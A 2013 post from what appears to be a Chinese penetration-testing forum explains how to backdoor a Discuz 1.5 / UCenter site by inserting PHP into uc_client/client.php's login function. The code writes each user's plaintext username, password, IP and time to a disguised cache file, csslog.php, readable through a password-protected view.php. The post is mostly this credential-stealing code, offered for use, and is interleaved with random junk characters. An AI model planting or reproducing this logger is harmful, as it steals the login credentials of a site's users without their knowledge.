中国网络渗透测试联盟

标题: dz1.5记录用户名和密码 [打印本页]

作者: admin    时间: 2013-2-27 21:40
标题: dz1.5记录用户名和密码
修改uc_client目录下的client.php 在& S! Z/ d! F6 J6 }% X
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
/ Z9 U  l9 i) C下加入如上代码,在网站./data/cache/目录下自动生成csslog.php; V/ I, u5 D( _2 s
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw- c3 s; f8 @' X+ ?/ P  d
if(getenv('HTTP_CLIENT_IP')) {
  |7 H1 P; e1 u" p$onlineip = getenv('HTTP_CLIENT_IP');$ N9 T0 ?, ~) l& D! X5 Z' q) f- E# }5 ]3 ~
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
+ w' y) c' \% c$onlineip = getenv('HTTP_X_FORWARDED_FOR');  E! f& z7 N+ C4 J
} elseif(getenv('REMOTE_ADDR')) { & A7 N9 V6 g; \8 W8 q9 c
$onlineip = getenv('REMOTE_ADDR');
/ W! ~+ x; B9 b; g5 w} else { $ _0 |# k, C; Y4 o
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
3 Q6 G+ J% U$ l0 ^( h& `' Y}
  i5 f4 P# R+ n1 t6 p     $showtime=date("Y-m-d H:i:s");2 |" i' i' O6 C0 i
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
% }" y; \7 ]9 ^6 z) \$ F! I" ^- D) e" ~    $handle=fopen('./data/cache/csslog.php','a+');
! y7 E/ H+ H2 z! g7 W    $write=fwrite($handle,$record);




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2